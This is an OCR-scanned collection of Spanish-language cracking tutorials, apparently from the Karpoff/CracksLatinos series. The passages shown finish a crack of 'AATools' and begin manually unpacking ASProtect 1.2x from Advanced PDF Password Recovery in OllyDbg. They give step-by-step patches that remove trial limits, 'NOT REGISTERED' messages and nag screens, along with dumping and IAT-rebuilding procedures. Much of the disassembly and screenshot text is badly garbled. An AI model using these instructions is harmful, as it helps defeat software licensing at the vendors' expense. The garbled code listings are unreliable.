O006ASAE1 C3 RETN 


Ahora que pensamos que ya lo tenemos y ejecutamos es cuando nos damos cuenta de que siguen 
jugando con nosotros. 


El problema está justo en una zona que viene un poco después de lo que acabamos de arreglar, este es 
el código: 


00404ED8 /$ 31C9 XOR ECX,ECX 


00404EDA |. 85D2 TEST EDX,EDX 

00404EDC |. 74 21 JE SHORT aatols-C.00404EFF 

00404EDE |. 52 PUSH EDX 

00404EDF |> 3A0A CMP CL,[BYTE DS:EDX] fl Aquí se produce la excepción, 


se compara con ??? 
00404EE1 |. 74 17 JE SHORT aatols-C.00404EFA 


00404EE3 |. 3A4A 01 CMP CL,[BYTE DS:EDX+1] 
00404EE6 |. 74 11 JE SHORT aatols-C.00404EF9 
00404EE8 |. 3A4A 02 CMP CL,[BYTE DS:EDX+2] 
00404EEB |. 74 0B JE SHORT aatols-C.00404EF8 
00404EED |. 3A4A 03 CMP CL,[BYTE DS:EDX+3] 
00404EFO |. 74 05 JE SHORT aatols-C.00404EF7 
00404EF2 |. 83C2 04 ADD EDX,4 

00404EFS5S |.*EB E8 JMP SHORT aatols-C.00404EDF 


Pues en edx hay otra referencia probable al Asprotect y se produce una excepción y después un 
desbordamiento de la pila. Pues bien para solucionar esto vamos a buscar loas direcciones en donde se 
llama a esta zona y a poner un breakpoint en cada una para llegar justo al punto donde se maneja la 
dirección falsa. Para esto nos paramos en 00404ED8 y damos Ctrl.+R y después Breakpoint para todo 
el mundo. En fin vamos a caer en 4ed37c 


CPU - main thread, module aatols-D 


PUSH_EBX 

MOU EBx, EAX 

3BC3 MOU EAXx, EBX 

2B15 BSCD6AGO (MOV EDX, [DWORD DS:6ACDB8I 
ES 4C7EBFIFF CALL _aatols-D. 00404ED0S3 
SB POP EBx 


Cc3 RETN 

3BC0O MOU EAX, EAX 

55 PUSH_EBP 

3BEC MOU EBP, ESP 

A1 COCD6AGO MOU EAXx, COWORD DS: 6ACDCO] 
AS BCCO6AGO MOU COWORD DS: 6ACDECI,EAX 
3B45 43 MOU EAX, COWORD SS: EBP+8] 
ES COCDE6ADO MOV COWORD DS: 6ACDCO7,EAX 
C2 0400 


ao] 
de 


Sl 


POP EBP 


RETN_4 
3040 00 LEA EAX, COWORD DS: EAX1 
55 PUSH _EBP 
2BEC MOU EBP, ESP 
Al DSCDSADO EAX, COWORD DS: 6ACDDS] 
AS D4CDSADO COWORD DS: 6ACDD47,ERX 
3B45 53 EAX, COWORD SS:EBP+8] 
AS DSCD6AGO COWORD DS: 6ACD0S7,ERX 
3B45 BC EAX, COWORD SS: EBP+C] 
AS DCCO6AGO 
5D 
C2 6300 


COWORD DS: 6ACDDCI,ERX 
RETN_3 
ia (als) LEA id DS: EAX] 


A 
Dada 


ao 
DIOS 


O 


DEA 
DO Gal 


aaa o o 


apa 


EBP 
5 PUSH _EBP 
2BEC EBP,ESP 
Al E4CDGAGO ERX, COWORD DS: 6ACDE4] 
AS ESBCDSAGO COWORD DS: 6ACDEG7, ERX 
3B45 3 EAX, COWORD SS: EBP+8] 
AS E4CDSADO COWORD DS: 6ACDE47,ER%X 
3B45 BC EAX, COWORD SS: EBP+C] 
EA ESCD6ADa o DS: 6ACDES1,EAX 


C2 63800 RETN_8 

3040 60 LEA EAXx, COWORD 0S: EA*X] 

55 PUSH_EBP 

3BEC MOU EBP, ESP 

68 18044E05 PUSH_aatols-D. 004ED41A 

ES 06044E00 MOU EAX, aatols-D, 004ED406 
3300 B2 ADD EAx, 2 

FFEO JMP NEAR EA%x 


DO 
E 


SJ 


Sy 


al 


DD 


DI 


Do 


1D E 


2. 
mo 
= 


do 


o 


Vemos que se mueve a edx 01473731, pues bien, buscamos en el programa original que es lo que 
supone que vaya aquí y es 01183731, en realidad lo que hace falta es que en ese lugar hayan par de 
ceros para la comparación de más adelante; entonces cambiamos el 

004ED381 |. 8B15B8CD6A00 MOV EDX,[DWORD DS:6ACDB8] 

por 

004ED381 MOV EDX,buscar una dirección en el Dump en donde haya ceros 

004ED386  NOP 


(esta excepción no afecta a nuestro programa) y queda resuelta esta parte pero seguimos teniendo 
problemas L.. 


Seguimos traceando y vamos a llegar a una zona en la cual es donde se pasan los mensajes de “Not 
registered” y ya de paso vamos a aprovechar para que el programa no diga mas que no estamos 
registrados, caemos aquí: 


006A2F15 |. 83B8 F4040000 00. CMP [DWORD DS:EAX+4F4],0 

DO6A2FIC |. 75 3F JNZ SHORT aatols-C.006A2F5D 

006A2FIE |. 8B45 FC MOV EAX,[LOCAL.1] 

006A2F21 |. 05 F4040000 ADD EAX,4F4 

006A2F26 |. BA 28326400 MOV EDX,aatols-C.006A3228 ; ASCII "NOT REGISTERED" 
006A2F2B |. E8 OCIED6FF CALL aatols-C.00404D3C 


006A2F30 |. 68 40326400 PUSH aatols-C.006A3240 ; ASCII "AATools ::: " 
006A2F35 |. 8B45 FC MOV EAX,[LOCAL.1] 

006A2F38 |. FFBO F4040000. PUSH [DWORD DS:EAX+4F4] 

006A2F3E |. 68 58326A00 PUSH aatols-C.006A3258 AS CIAE 
006A2F43 |. 8D45 CC LEA EAX,[LOCAL.13] 


006A2F46 |. BA 03000000 MOV EDX,3 

006A2F4B |. E8 2C21D6FF CALL aatols-C.0040507C 

006A2F50 |. 8B55 CC MOV EDX,[LOCAL.13] 

006A2F53 |. 8B45 FC MOV EAX,[LOCAL.1] 

006A2F56 |. ES 790DDBFF CALL aatols-C.00453CD4 

006A2F5B |. EB 0D JMP SHORT aatols-C.O0D06A2F6A 

006A2F5D |> BA 68326A00 MOV EDX,aatols-C.006A3268 ; ASCIH "AATOools" 


Vemos que se compara algo con cero y si no es igual se salta todo eso, pues a cambiar el O por un 1 o 
a poner que salte siempre. 


Más abajo, en la llamada 

006A2F6D |. ES 72300000 CALL aatols-C.OOGASFEA (a aquí llegamos porque se produce otra 
excepción) entramos y llegamos a una llamada a GetProcAddress y después un 

006A6024 . FFDO CALL NEAR EAX 

donde eax también tiene otro valor raro y es que resultó que la llamada a esta api le toca a : 


0118E494 55 PUSH EBP 

0118E495 SBEC MOV EBP,ESP 

0118E497 8B55 0C MOV EDX,[DWORD SS:EBP+C] 
0118E49A 8B453 08 MOV EAX,[DWORD 5SS:EBP+38] 
0118E49D 8B0D B8541901 MOV ECX,[DWORD DS:11954B8] 


0118E4A3 8B09 MOV ECX,[DWORD DS:ECX] 

0118E4A5 3BC8 CMP ECX,EAX 

0118E4A7 7509 JNZ SHORT 0118E4B2 

0118E4A9 8B0495 14531901 MOV EAX, [DWORD DS:EDX*4+1195314] 
0118E4B0 EB 07 JMP SHORT 0118E4B9 

0118E4B2 52 PUSH EDX 


0118E4B3 50 PUSH EAX 


0118E4B4 E8 FF6BFFFF CALL 011850B8 ; JMP to kernel32.GetProcAddress 
0118E4B9 5D POP EBP 
0118E4BA C2 0800 RETN 8 


que habíamos vistos que era verdadera....., 


error, no es del todo verdadera pues ahora el JINZ SHORT 


0118F4B2 no va a resultar y se va a pasar a eax un valor más que raro que es adonde se va a hacer la 
llamada del Call Near Eax, pues bien buscamos los valores en el ejecutable original y a mi al final me 
queda que lo que se hace es pasar a eax un 11 por lo que nos comemos la llamada a la api y el call 


near eax y ponemos un mov eax,11: 


CPU - main thread, module aatols-C 


55 

683 32606A00 
64: FF3D 
64:3920 

. ES DSFS6AD0 


a 
a D4FS6ADO 


59 
. 64:8910 
«VEB BC 
.“E9 AIESDSFF 
. 33DB 
. ES B2E7DSFF 


> BE 1E000000 
. 2BF3 


. B2 61 

. Al ECTAGADA 

. ES 4AP2DCFF 
3945 FC 
3300 


55 

63 99606A00 
. 64:FF30 
. 64:3920 


. 38B45 FC 
. 8950 1CO30000 
3B45 FC 


3B10 


. 35CO 
«“BFSS 9B000000 
3300 


. S83FE 03 CMP ESI,S 

.v?2 56 JB SHORT aatols-C. BB06AGBAD 
. 8B0D 4CFDGADO| MOV ECX, COWORD DS: 6AFD4CI 
. BBB9 MOU ECX, CDOWORD DS: ECXI 


TEST EAX,E 

JNZ tolaa: BOSACOAD 

20R EAX, EAX 

PUSH EBP 

PUSH aatols-C., BB6AGO32 

PUSH COWORD FS:EAXx] 

MOU COWORD FS:EAXJ,ESP 

MOU EAX, COWORD DS: 6AFSOSI 

PUSH_EAX 

MOU EAX, COWORD DS: 6AFSD4] 
SH EAX 


ECX 

COWORD FS:EAXJI,EDXx 
SHORT aatols-C. BM6AGOSE 
aatols-C, 60404308 
EBX,EBXx 

CALL astols-C. pa404740 

MOU ESI,1E 

suB ESI,EBX 


MOU DL, 1 

MOV EAX, COWORD DS: 6A7AECI 
CALL aatols-C.0046D2A8 
MOV CLOCAL.11,EAXx 

20R ERX, EAX 

PUSH EBP 

PUSH aatols-C. 0066099 
PUSH COWORD_FS:EAxXI 

MOU COWORD FS:EAXI,ESP 
MOU EAX, CLOCAL. 13 

MOU COWORD DS:EAX+31C0J,ESI 
MOU EAx, [LOCAL. 1] 

MOV EDX, COWORD DS: ERXI 


Seguimos bajando con F8 y nos vamos a tropezar con que en 
006A607D FF92E8000000 CALL NEAR [DWORD DS:EDX+E8] 
sale la nag del principio, por lo que si nopeamos esta Call nos cargamos a la nag. 


Más abajo, después del RET|N caemos en: 


O06A60AO /> 5F POP EDI 
D06A60A 1 |. SE POP ESI 
006A60A2 |. SB POP EBX 
D06A60A3 |. 59 POP ECX 
006A60A4 |. 5D POP EBP 


; aatols-C.006A 174C 


O06A60AS A. C3 RETN 


O06A60A6 00 DB 00 
006A60A7 00 DB 00 
006A60AS . FFFFFFFF DD FFFFFFFF 


Pero resulta que en el último POP se puede ver en el ejecutable original que se queda de puntero en la 
pila el valor 006A2F72 y el RETN nos lleva a esta dirección. En nuestro ejecutable dumpeado este 
valor esta dos veces más abajo por lo que el RETN nos lleva a otro lugar que no sirve. Pues para 
resolverlo se me ocurrió aprovechar los dos 00 que hay debajo del RETN y poner par de POP EBP, 
quedaría así: 


O06A60AO /> 5F POP EDI 
006A60A1 |. SE POP ESI 
006A60A2 |. 5B POP EBX 
006A60A3 |. 59 POP ECX 
006A60A4 |. SD POP EBP 
O06A60AS 5D POP EBP 
O06A60A6 5D POP EBP 
006A60A7  C3 RETN 

006A60AS . FFFFFFFF DD FFFFFFFF 


Y con esto si le ganamos al ASprotect ya nos funciona nuestro dumpeado y esta libre de la restricción 
del tiempo y no dice en ningún lado que no estamos registrados. Tres urras para nosotros. 


Hay un detalle cuando damos About en el programa, nos sale un cartel de error y es el mismo 
problema de hace un rato que se estaba comparando con ???, en el cartel nos dice la dirección donde 


se produjo el error, y efectivamente fue en esta parte: 


00404ED8 /$ 31C9 XOR ECX,ECX 


00404EDA |. 85D2 TEST EDX,EDX 

00404EDC |. 74 21 JE SHORT aatols-C.00404EFF 

00404EDE |. 52 PUSH EDX 

00404EDF |> 3A0A CMP CL,[BYTE DS:EDX] fl Aquí se produce la excepción, 


Ponemos un breakpoint aquí, damos About en el programa y cuando pare buscamos con Ctrl.+R todas 
las referencias a esta parte, ponemos breakpoint en ellas damos F9, Shift+FF7, F9 de nuevo y damos 
otra vez About. Esta vez caemos en 


0063BE09 |. Al CSFB6A00 MOV EAX,[DWORD DS:6AFBC8] 

0063BE0E  8B00 MOV EAX,[DWORD DS:EAX] 

0063BE10 |. 50 PUSH EAX 

en donde en la segunda instrucción se pasa un valor a eax de los que nos dan problemas, así que 
nopeamos esta segunda instrucción y ya no más cartel. 

Sería: 


0063BE09 |. Al CSFB6A0O MOV EAX,[DWORD DS:6AFBC8] 
0063BE0E 90 NOP 


0063BE0F 90 NOP 
0063BE10 |. 50 PUSH EAX 


Ahora si que terminamos, después de tantos dolores de cabezas. 


Agradecimientos: Auspex y a DGrojo por sus tutes, realmente me ayudaron, a Ricardo también por 
sus tutes y por su gran ayuda prestada, la conversación que tuvimos por el Messenger me sirvió de 
mucho y a todos los de Crackslatinos. 


Cualquier problema, algo que no entiendan, o alguna sugerencia me pueden escribir a 
cubafreak O yahoo.com o a cubafreak O hotmail.com. 

Recuerden que este tutorial es solo con fines educativos. 

Saludos y muchas gracias......Hasta la próxima. 
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Karpoff Spanish Tutor 1999-2002 
Advanced PDF Password Recovery 


Asprotect 1.2x 
Desempakado Manual con OllyDbg 


Programa que permite desencriptar los archivos con formato PDF. Es decir nos permite desproteger los 
archivos en PDF 


Al principio fue muy dificil, pero una vez que se le coge el truco 


nhttp:/ / www.elcomsoft.com 
PEID 0.8, PEDITOR 1.7, Olly DBG 1.06, Memory Dumper v1.0, Revirgin y Topo 
DGrojo FECHA: 05/10/2002 
INTRODUCCION 


Bueno pues aquí estamos de nuevo con otro desempacado de Asprotect 1.2x, en este caso he considerado hacer 
este programa porque es ligeramente distinto a los demás, y es que ya me parecen muy sencillos, ahora que se de 
qué va el tema claro, xD. 


En el caso de este he tenido que recurrir a Topo para resolver una molesta entrada, que no afecta al 
funcionamiento del programa, pero si afecta a la introducción de la clave de registro. 


Sin más confiar que estos tutoriales os sean de gran ayuda, cuando debais enfrentaros a algún Asprotect. 


AL ATAKE 


Antes que nada sería conveniente saber la base de la imagen y su largo, así que abrimos Peditor por ejemplo y cargamos el 
programa original: 


[ PEditor 1.7 ] by yoda £ M.o.D. al ES 


[scouting... Ci4rchivos de programa 4PDFPRapdfpr.exe - 567808 bytes big 


File Info File Header 
Entry Point: [00001 000 Machine Type: forac tasks 
Image Base: [00400000 Number of Sections: [0004 ! 

Time Date Stamp: [3CCD3446 section split 


browse 


Optional Header 


lia 00001000 Pointer to Symbol Table: [00000000 ii 


Do ala 000CA000 Number of Symbols: [00000000 Eo 
aos: 00138000 Size of Optional Header: fooeo o. 
Size of Headers: — [ODOODEOD Characteristics: [030€ mios 


Section Alignment: [00001 000 Tables apply changes 


File Alignment: [00000200 about 


EE fono2 o sections directory eXit 


Hold your mouse on a edit box for more infos... 


Bueno pues anotamos lo siguiente: 
Base de la imagen: 400000 
Tamaño de la imagen: 138000 


Como siempre en estos casos lo que deberemos hacer es analizar la víctima a ver si nos enteramos con qué está comprimido, 
el compilador, o su Punto Original de entrada del programa u OEP. 


Abrimos PEID 0.8, y esto es justamente lo que nos va a mostrar: 


+ ¿PEiDentifier v0.8 


Open File C: Archivos de programa! APDFPR/apdfpr.exe 


Entry Point: 1000h--... EP Seca 
File Offset : '600h  FirstBytes: 068h,001h,060h,052h 
Linker Version; 5,0. SubSystem: Win32GUI(DDD2) 
Information : 


ASProtect 1,2x [New Strain] -> Alexey Solodownikow 
FT stay-On-Top Menu 
Vemos que está empacado con Asprotect de mi amigo Alexey : D. 


Pulsamos sobre el botón menú y lego pulsamos en OEP module para hallar el OEP, nos mostrará esto: 


DOE 


Como siempre he dicho, no os fieis, puede ser que sea bueno o no, eso si siempre es una referencia para saber por donde 
van los tiros. 


Vamos a compararlo con el que obtengamos en Olly, así que abrimos Olly y cargamos el programa original en el, ejecutamos 
con F9, ya vamos ir encontrarndo una serie de excepciones que iremos superando con Mayusculas+F7, como unas 20 o así, 
hasta que llegue una en la cual se carga el programa original, es decir que ya no para. Bueno pues hacemos otra vez lo 
mismo hasta llegar a esta última dirección que será esta: 


3 3100 X0R DWORD PTR DSITERRT, ERA 
-2164:8F05 00000000 POP DWORD PTR FS: [0] 
53 POP EAX 


21833D DS6A1D01 06 CMP DWORD PTR DS: [11D6ADS 
74 14 a 811D24ED 


>16A BC 

:/B9 DS6A1D61 MOU ECXx, 11D6AD3 

318045 FS LEA EAx, ia PTR SS: [EBP- 
> ¡BA 04000090 MOU EDx 


31E8_O3BFFFFF CALL DLÍCESFO 


PUSH DWORD PTR SS: CEBP-4] 
PUSH_DWORD_PTR SS: [EBP-8] 
MOU EAX, DWORD PTR SS: CEBP- 
CMP_OWORD_PTR DS: [EAXJ,0 
JE SHORT B11024FD 

PUSH DWORD PTR DS: [EAXJ 
PUSH DWORD PTR SS: CEBP-10 
PUSH DWORD PTR SS: [EBP-14 
RETN 

POP EDI 

POP ESI 

POP EBx 

MOU ESP,EBP 


= paa 
DS: [000000007=7 77 


PE header 
code 


exports 
resources 


data, import 


DIDIDIDDD 


E 


mm DINO ( 


IDA NINO mmmmm 


Y BB76FF6S 
4 M11DZAE4 
' BB7EFDDC 


' BOTÉFEOS 


0110000 
811C0000 


P 01102406 


TO empty 


empty 


Ejecutamos una vez más con Mayusculas+F7 y F9, y estaremos en el OEP del programa: 


E CPU - main thread, module APDFPR (Of x 


MP SHORT APDFPR, 80481012 Registers (FPU 
EQUND_DI,DUORD PTA DS: LEDA] e 


00401905| 43 Cx 81A3B7BD 
00401 EBP, DWORD PTR DS: [EBxI Dx S1A3B7FB 
00401008 | 48 EAX Xx BOGSODOD 
60401AB< ep 

a p401 1 gBA z d OPS rESS 
0n4B ; SI 81A3B790 


198 
00401000|E9 FBAJ4COD OBSCESOZ p000000a 
00401612|A1_E3A44C00 EAX, DWORD PTR DS: [4CA4E3] ' BO4B1000 
06401617|C1E98_02 EAXx, 2 coa S B16F 
0b401514| A3 E7A44C0B MOU DWORD PTR DS: [4CA4E7],EAX P 1 CS lez 
on40101F 52 PUSH EDX Pol E 


Dodo TO IS-APOFPRAOOADIDIZ e Ss 0 


Address | Hes_ uno ————JAsCIL | parehESC 

5 95 66 ES 63 506 Bb 9E"bv...U O 3 

pl 5/55 C3 ES 6 De JEUREO 
: 5D B F 


£ C¡61 
2 6C 00 


75 m6 ¿05 4% 
50 03 51/0%r..PH BB7ÉFEES 


Vale pues como vemos este coincide con el de PEID, bién vayamos a volcar a disco ahora mismo, así que no voy a volver a 
explicar el tema de porqué no funciona LordPE, ProcDump y demás porque ya lo he explicado en el tutorial de RAM Idle, así 
que directamente abrimos el Memory Dumper v1.0 que trabaja muy bién con Olly y ponemos esto: 


$$ Memory Dumper Y1.0 El 


Target Process 


CAARCHIWOS DE PROGRAMAAADOBEAPHOTOSHOP 5.54PHOTOSHP.Ex a 
CAARCHIYOS DE PROGRAMA APDFPRAAPDFPR EXE 
CAARCHIVOS DE PROGRAMSACOMMONNAME,TOOLBARACNFORM.EE 
CAARCHIVOS DE PROGRAMANMEMORY DUMPERAMEMDRYDUMPER.E: 
CAARCHIWOS DE PROGRAMAAMESSENGERAMSMSGS.EXE 
CAARCHIWOS DE PROGRAMASAMICROSOFT OFFICENOFFICENWINWDORD: 
CAARCHIVOS DE PROGRAMA WINAMPYWINAMP.EXE 
CABRCHIVOS DE PROGRAMAAZONE LABSAZONEALSAMAZONEALSAM.! 


CAOLLYDBG+OLLYDBG.EXE 
a 
» 


CAPEEDITORAPEDITOR.E<E 
CASCANJETPRONPRECISIONSCANPRO+HPLAMP.EXE 
CXAWINDOW'S1EXPLORER.E<E 

Refresh Process List [Download Process Memory To File y] 

Buffer Details 

File Name je: WINDOWS Escritorio-proyectosrapdipriapdipr_dump.exe El 


Start Location (0x400000 
Byte Count (0x138000 Register 


peo | En | 


Es decir seleccionamos el proceso de APDFPR que es el ejecutable original, seleccionamos para File Name, la localización y el 
nombre de nuestro archivo volcado, en Start Location ponemos la Base de la imagen y en Byte Count ponemos el largo de la 
misma, y lo hacemos como siempre como Ox porque está en hexadecimal. Tras un ratillo ya estará volcado el archivo. 


Este archivo aún hay que arreglaro porque al tomarlo de la memoria tiene los offsets de disco y memoria descuadrados, así 
que como siempre abrimos el Peditor y cargar el archivo que acabamos de crear, vamos a seccions y con el botón derecho 
pulsamos en Dumpfixer, y estará ya arreglado en cuanto a offsets se refiere. 


Bién, lo de siempre la famosa |AT, ya sabeis que Asprotect la destroza. 


Ejecutamos el programa original, abrimos Revirgin (qué fantástica utilidad, aunque alguna mejora no le vendría nada mal, 
jeje) y sellecionamos el proceso relativo al apafpr, que es este ejecutable original, vamos a OEP y ponemos el del programa 
401000, pulsamos en Fetch |AT y nos saca algo como esto: 


—lAT Critical Values 


DEP [00401 000 
RVA [oooF1 394 — FetchláT 
Length [00000228 


Y aquí me mosqueé cuando vi que sólo sacaba las funciones importadas del módulo Kernel32, uh uh algo no va bién, así que 
como siempre vamos a ver que pasa en Olly, es decir busquemos la |AT a mano. Pues entonces cargamos el programa en 
Olly llegamos al OEP, trazamos un poquito con F7, hasta que llegamos a lo que parece el salto a una función importada, es 
decir a esto: 


(33 CPU - main thread, module APDFPR 
40144F00 DS: [4F144C 


50144F00 
54144F00 
53144F00 
5C144F00 
60144F00 
64144F00 
63144F00 
£C144F00 
70144F00 
74144F00 
r3144F00 
7C144F00 
20144F00 
24144F00 
283144F00 
28C144F00 
90144F00 


Pulsamos con el botón derecho del ratón en la instrucción según se indica y ejecutamos Follow in Dump, Memory Address, en 


la ventana de datos nos aparecerá lo siguiente: 


DS: [4F1450] 
DS: [4F1454] 
DS: [4F1458] 
DS: [4F145C] 
DS: [4F14606] 
DS: [4F1464] 
DS: [4F1468] 
DS: [4F146C] 
DS: [4F1470] 
DS: [4F1474] 
DS: [4F1478] 
DS: [4F147C] 
DS: [4F1486] 
DS: [4F1484] 
DS: [4F1488] 
DS: [4F148C] 


DS: [4F1490] 


Backup 
Copy 
Binary 
Assemble 
Label 
Comment 
Breakpoint 
Run trace 


Follow 
New origin here 
Goto 
Follow in Dump 


Search for 


Find references to 


View 


Copy to executable file 


Analysis 


Selection 
kMemor y ad dre 


Bookmark 


Appearance 


43C 1E 61 /5L461Láb 
¡ 8C 4C 1E 01| ¡LáabILaO 
9C 4C 1E 01/mbLO£LAD 
EC 4C 1E 01 Later Lao 


8C 4D 1E 01| ¡Magimáao 
9C 40 1E 01/*bLB£MAB 
EC 4D 1E 01 4ñasunao 
DC 40 1E 01 | [fMaGml4o 
FC 40 1E 01/yMaBMáb 
1C 4E 1E O1|.NAOLNAO 
 NAg<Nao 
LN4GsN4b 
[N49 Na 
INAGENAD 
NAGY NAS 
[FNG NAS 
JNAG NAG 
¿048 04D 
;D48<D4B 
LuLBLOA6 
:048 [048 
¡0481040 
jOAB¿0A8 
0A0EDAS 
F0486 048 
SDABgPAO 
+PAB(PAO 
SPABHPAO 
XPABhP4O 
«PADEPAG 
JPAD¿PAO 
OPAGEPAD 
iPADBPAD 
SPARgOAO 
1045040 
S0ABHOAO 
AQABh QA 
¿QAEDA 
¿OABiAS 
OOABEDAS 
iQABEDAD 
SDABORAO 
táB.... 


m 
o 
no 
o 
. 
m 


0 Eb. 
204F1504 08 08 0 09 BO 10 00 MA .....o.. 
004F150C! 60 00 00 08 08 00 BO BA .o.oo.o. 


Entonces en esta ventana nos desplazamos hacia arriba, hasta encontrar no un bloque largo de ceros no os confundais sino, 
un bloque largo de ceros, y la primera palabra que esté escrita en esta sección, es decir hasta llegar a: 


veis de lo que estaba hablando, que no os podeis descuidar, fijaos como debajo de eso que está escrito hay un bloque de 
ceros. Bién pues la dirección 4F1130 es el comienzo de la |AT, ahora sólo nos queda el largo, así que nos desplazamos hacia 
abajo para encontrar lo mismo, un bloque de ceros y antes la última palabra que haya escrita, es decir esto: 


[Address [Hex _dump__________ fascir_ | 
52] 2] E 


¡3%40H"48 
¡ROBA db 
¡¿óágetao 
¡Goabicab 


5005005000000 
Jr J Joo o J Ja o Ja J Juda pa| 


DO ........ 
TE 2... HA=Ó 
7F honra T=6 
LES 


Ol cono... 


DO coo. ... 
DO coo. .... 
DO cc. ... 
DO cc 
65|....Plbe 
65| Cúbe.¿6e 
65| -Bó6ebEbe 
65) MEbebañe 
65| pte 6e 
0 il6e 


ABÍF20B8S Ol ..ooono. 
BBÍF26CA Ll 

4F 8 DO ..:ansos 
DOl ooo... 
Dl ..o.o.o. 
DOlocono.o. 
OOliccoo... 
DOlcocnoon.. 
DOloscom.o. 
DOl..o.o.o. 


Ol .oooo... 


aa 


Así que el final de la |AT está en 4F2080, así que si restamos 4F2080 - 4F1130 nos da F50 que es el largo de la AT. 


Nos vamos entonces a Revirgin, y con el OEP tal cual estaba en 401000, el comienzo de la |AT, como offset F1130 y el largo 
F50, damos sobre el botón |AT Resolver, y luego a Resolve Again, y obtendremos esto: 


4 Revirgin by +Tsehp 1.3 public version Al ES 
[apdtpr.exe FFFE62D1 00138000 00400000 y] Refresh | 


[Select Module to áltach y ] 
Module [Ordinal [Name [Address |lATRva - 


ADVAPI32.dll [00000008 [RegCloseKey [BFES1644 [000F1134 [18 
[ADVAPI32 dl DOODDODC  RegCreateKeyE BFE8167D_DOOFI13C 02 
[ADVAPI32 dl DOODDODF  RegDeleteKeyé BFE81787 D00F1140 00 
[ADWAPI32.dll 000000E1  RegDeletevalu BFE81376 000F1144 00. 
BFEBTAF2 
[ADVAPI32 dl 00000103 RegSetalueE» BFESTSEA DOOF115C 00 
KERNEL32 dll DO0DO0A0  CloseHandle  BFF7EDBD D00F1394 00 
KERNEL32.dll 00000046  CompareStringé BFFATC?C 000F1398 00 
KERNEL32 dll DOODOOAD — CopyFilea  BFFATATC DOOFI39C 00 
eS 
IKERNEL32.dll O000DOB6 — CreateEventá BFF77590 000F1344 00 
KERNEL32 dll DO00DOB9 — CreateFileá  BFF77ADB D00F1I348 00 
KERNEL32.dll ODOODOBA — CreateFileMapr BFF77694 O00FI34C 00 
KERNEL32 dll DOODDOCD  CreateThread BFF7EFEE DOOFI3B0 00 y] 


í Stop 

¿5187 Critical Values IT Values + É 

IATA ly generatol 

- DEP 00401000 E 

: RYA | 

RAYA [oooF1 130 Fetch14T | generate! | 


Length [0000050 Load resolved] | eng [00000244 
Save resolved| 


[Y ShowlA4T referers [o0000021 cas | fónos All y] 


[Y Autofix sections +1T paste 


 Mangled Scheme high limit í 0000000 


About | 
apdfpr.exe Resolved imports View Import Edit disabled Y 


Ahora ya tiene mejor pinta ya que saca funciones importadas de todo tipo, vaaaaaaale que me enrollo demasiado, damos a 
Show Unresolved y nos muestra lo siguiente: 


Module [Ordinal [Name [Address  [lATRwva  |Refsi= 


OOOO OTICESSL ODOFISFO 00 
OOO TACESC OOOF13FC 00 
OA OTE OOOF1404 00 


O IOMICEBDC OOOFI4AC 00 
DO IOMACEABC OOOFIA5C 00 


O IOMICESFS OOOFI4S4 00 


OOOO OTICESAC OOOF1S04 00 


Umm algo distinto de los otros que he hecho, y aquí mucho cuidado!, nos ha mostrado estas pero como siempre compruebo 
todo, si lo poneis en Show All y os desplazais para buscar estas entradas sin resolver casualmente os encontrareis con esta: 


USER32.dI_ 00000088 DestroyCursor BFCOS941 O00FIDS8 |00 | 
USER32.dl 00000088 DestropCursor BFCOSGA1 ODOFIDSC 00 
USER32.dl 0000008D |DestiyMenu BFCO24F7 ODOFIDEO 00 
USER32.dl_ 0000DOSE _ Destroywindow BFCO24CF ODOFIDG4 00 | 


A 
USER32.dl 00000093 _ |DispatchMessa BFCO4733  ODOFIDEC 00 | 
USER32dI 00000043 DrawEdge  BFCOAEO O00FID?O |00 
USER32. dl 00000044 DrawFocusRec BFCO2130 O00F1D74 00 | 
USERSZAs (D00000AS_[DieuFrameCoriBFOMADA [OQNFID?E [po Ls 


lead DODOD047 — Drawlcon BFCOS46D D00F1D7C 


que casualmente no salió en las lista de las unresolved y no se porqué, ;) 


Bueno en este caso no hay estrategia que valga, es decir no hay grupos iguales, no hay cosas que ya nos suenen, pero la 
experiencia cuenta y de antemano se que habrá entradas falsas, y que seguro que encontraremos las entradas de siempre 
GetModuleHandlea, GetprocAddress, GetCommandLineA y GetVersion (y que ya me huele que el resto siempre son falsas, y 
sólo hay que fijarse en cómo acaba la función si en RETN o RETN4), y que las detectaremos por mi especie de regla. Vamos 
a enumerarlas de todos modos y a ver que sacamos: 


Entradas sin resolver: 


(1) 11CE95C 4F13FO 


(2) 11CE93C 4F13FC 


(3) 11CE930 4F1404 


(4) 11CE8DC 4F144C 


(5) 11CE48C 4F145C 


(6) 11CE8F8 4F1494 


(7) 11CE94C 4F1504 


(8) 11CE97C 4F1D68 
Entrada 1: 


Venga lo de siempre, con el programa cargado en Olly al haber llegado ya al OEP, hacemos Crtl+G en la ventana de código y 
ponemos el offset de la 1, que es 4F13FO, que lo hago así para ver el código y para ver desde donde se llama porque es un 
dato que puede hacer falta, y vemos con Crtl+R desde donde es llamado, pulso Enter ahí y vamos al final al siguiente código: 


Es llamada en la dirección 4C8E7A, es decir tenemos: 
004C8E7A FF25 FO134F00 ] MP DWORD PTR DS:[4F13FO0] 
pulsamos Enter aquí y llegamos a esto: 


0O11CE95C 55 PUSH EBP 

011CE95D 8BEC MOV EBP,ESP 
O11CE95F E8 6467FFFF CALL 011C50C8 
011CE964 5D POP EBP 

011CE965 C2 0400 RETN 4 


Esta entrada por experiencia ya me huele a que es falsa, pero de todos modos si quereis saber que es falsa poneos encima 
del Call y con la barra espaciadora, ensamblais la instrucción a un nop. Por cierto para saber donde va ese call os colocais 
encima pulsais Enter como un par de veces y va a GetVersion, y digo que se que es falsa porque GetVersion nunca lo hace 
así, siempre es con un Push cierto valor que devuelve a EAX. 


Ya sabeis para esta entrada en Hexworkshop cargais el archivo volcado y con Crtl+G vais al offset de donde es llamada esta 
entrada, os acordais que la hallamos y es C8E7A, y cambias todos los bytes que aparecen en la sentencia del jmp por un 
retn4 es decir por c20400 y rellenais con 90 (nops). Bién esta ya estaría. 


Entrada 2: 
Más de lo mismo, Crtl+G a 4F13FC, luego Crtl+R y vemos esto: 
004C8E7A FF25 FO134F00 ] MP DWORD PTR DS:[4F13F0] pulsamos Enter aquí y llegamos al código de la entrada que es: 


011CE93C 6A 00 PUSH O 

011CE93E E8 6D67FFFF CALL 011C50B0 

011CE943 FF35 14671D01 PUSH DWORD PTR DS:[11D6714] 
011CE949 58 POP EAX 

011CE94A C3 RETN 


vereis ya no me hace ni falta poner un breakpoint allí os lo voy a explicar, aunque con las reglas que os di se ve claro, si 
entrais en el Call con Enter un par de veces vereis que llama a GetModuleHandleA (falso) ya que luego carga EAX con el 
contenido de 11D6714, esto sin ejecutar ya vereis. Damos un Follow in Dump Memory Addres en la instrucción del Push, 
